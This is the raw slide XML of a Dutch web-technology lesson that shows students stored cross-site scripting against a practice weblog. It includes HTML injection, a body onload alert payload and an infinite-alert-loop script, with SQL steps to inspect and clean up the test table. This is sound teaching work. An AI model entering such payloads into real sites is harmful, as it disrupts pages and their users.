      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rechthoek 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4057650" y="2844800"/>
            <a:ext cx="8134351"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6" name="Title Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4057649" y="3420988"/>
            <a:ext cx="776817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4057648" y="3984455"/>
            <a:ext cx="7768172"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76531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688937" y="1096894"/>
            <a:ext cx="813688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3688937" y="2384427"/>
            <a:ext cx="8136880" cy="3952876"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>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3688939" y="1660355"/>
            <a:ext cx="813688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3688947" y="381573"/>
            <a:ext cx="813687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93534" y="2384427"/>
            <a:ext cx="3277809" cy="3952876"/>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7324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tex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3" y="873238"/>
            <a:ext cx="7725302"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8"/>
            <a:ext cx="7725304" cy="4291614"/>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3" y="1436705"/>
            <a:ext cx="7725304"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8"/>
            <a:ext cx="3495413" cy="4291613"/>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2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3688938" y="381000"/>
            <a:ext cx="8136879"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INTRODUCTION</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="135374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ory">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6"/>
            <a:ext cx="7725304" cy="4291615"/>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6"/>
            <a:ext cx="3495413" cy="4291615"/>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192852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193526" y="2045685"/>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1/2-kolom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11" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="17" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6147929" y="2045684"/>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2/2-kolom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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="172097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eory large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094921" y="969012"/>
            <a:ext cx="7730895"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355600" y="1762540"/>
            <a:ext cx="11470217" cy="4574762"/>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75818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338667" y="1643270"/>
            <a:ext cx="11487151" cy="4135231"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="720000">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr sz="3600" b="1" i="0" baseline="0">
                <a:latin typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>QUOTE GOES HERE</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="50800" y="1079501"/>
            <a:ext cx="1354667" cy="2554545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="16000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="837752"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="18" hasCustomPrompt="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3688936" y="5778500"/>
            <a:ext cx="8136880" cy="558800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0" algn="r">
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr b="1" i="0" baseline="0">
                <a:latin typeface="Helvetica Neue"/>
                <a:cs typeface="Helvetica Neue"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>NAME OF QUOTED PERSON</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="TextBox 5"/>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
        <p:nvSpPr>
          <p:cNvPr id="7" name="TextBox 6"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="178234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ignm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4" y="866611"/>
            <a:ext cx="7704391"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4" y="2032434"/>
            <a:ext cx="7704393"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6" y="1430078"/>
            <a:ext cx="7704391"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4"/>
            <a:ext cx="3495413" cy="4304867"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6491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rther readin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5" y="866611"/>
            <a:ext cx="7704389"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5" y="2032435"/>
            <a:ext cx="7704392"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7" y="1430078"/>
            <a:ext cx="7704389"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6"/>
            <a:ext cx="3495413" cy="4304866"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="117959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ample">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0"/>
            <a:ext cx="12192000" cy="6858000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="t" anchorCtr="1"/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0"/>
              <a:t>afbeelding toevoegen (optioneel)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="204866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0" y="1096888"/>
            <a:ext cx="7736419"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4114800" y="2384426"/>
            <a:ext cx="7711016" cy="37417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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="117085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5" r:id="rId4"/>
    <p:sldLayoutId id="2147483664" r:id="rId5"/>
    <p:sldLayoutId id="2147483665" r:id="rId6"/>
    <p:sldLayoutId id="2147483666" r:id="rId7"/>
    <p:sldLayoutId id="2147483667" r:id="rId8"/>
    <p:sldLayoutId id="2147483668" r:id="rId9"/>
    <p:sldLayoutId id="2147483676" r:id="rId10"/>
  </p:sldLayoutIdLst>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owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet" TargetMode="Externa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Web Technologie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>XSS:Cross</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> Site Scripting</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="Afbeelding 15"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="11708793" y="0"/>
            <a:ext cx="483207" cy="288874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Afbeelding 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6189678" y="5081904"/>
            <a:ext cx="2381250" cy="800100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Tekstvak 6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4320684" y="5153449"/>
            <a:ext cx="1748413" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Een bijdrage van het profiel......</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rechthoek 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4057649" y="5081903"/>
            <a:ext cx="4513279" cy="78942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8811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1.Onschuldige "Spielerei"</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Onschuldige Spielerei</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Stap3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Maak een normale entry, bv: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Te koop mijn drie jaar oude chute voor 1500 Euro.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <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Stap4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Klik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>voeg toe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>en bekijk het resultaat.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2858831" y="2984073"/>
            <a:ext cx="5380294" cy="2176030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2421361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1.Onschuldige "Spielerei"</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Onschuldige Spielerei</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Stap5</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Maak de volgende entry: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;h1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>style</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>color:red;font-weight:bold</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"&gt;zou dit werken&lt;/h1&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <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Stap6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Klik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>voeg toe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>en bekijk het resultaat.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2976559" y="2984073"/>
            <a:ext cx="5380294" cy="2176030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Tekstvak 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8549351" y="3333424"/>
            <a:ext cx="3083977" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Kijk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>mbv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t> de SQL management studio in de database waar het weblog opgeslagen wordt.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t>Database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQLinjectDB</a:t>
            </a:r>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0"/>
              <a:t>Tabel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>        : Weblog</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>select * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> weblog</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5523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2.Klieren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Klieren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Stap1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Maak een de volgende entry, bv: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;body </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=alert("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gotcha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>");&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <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Stap2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Klik </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>voeg toe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>en bekijk het resultaat.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2858831" y="2984073"/>
            <a:ext cx="5380294" cy="2176030"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Tekstvak 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8330085" y="3083329"/>
            <a:ext cx="3495742" cy="2862322"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC000"/>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" smtClean="0"/>
              <a:t>Nu wordt er Javascript in de pagina gebracht. Dit voorbeeld is nog onschuldig, maar javascript opent wel een hoop mogelijkheden.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Kijk wederom in de database. Verwijder na deze test de betreffende entry uit de database:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nl-NL" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="7030A0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>delete weblog </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>where</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> naam like '.. '</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="379523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3.Klieren, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" b="0" dirty="0" err="1" smtClean="0"/>
              <a:t>enhanced</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Klieren </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0" err="1" smtClean="0"/>
              <a:t>Enhanced</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5262979"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0"/>
              <a:t>Stap1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t> : Maak de volgende entry, bv: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" dirty="0" smtClean="0"/>
              <a:t>             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>language</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=javascript&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>doeiets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>            {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(1==1){alert("looping </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>gotcha</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>")};}&lt;/script&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>            &lt;body </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" sz="2800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>doeiets</a:t>
            </a:r>
            <a:r>
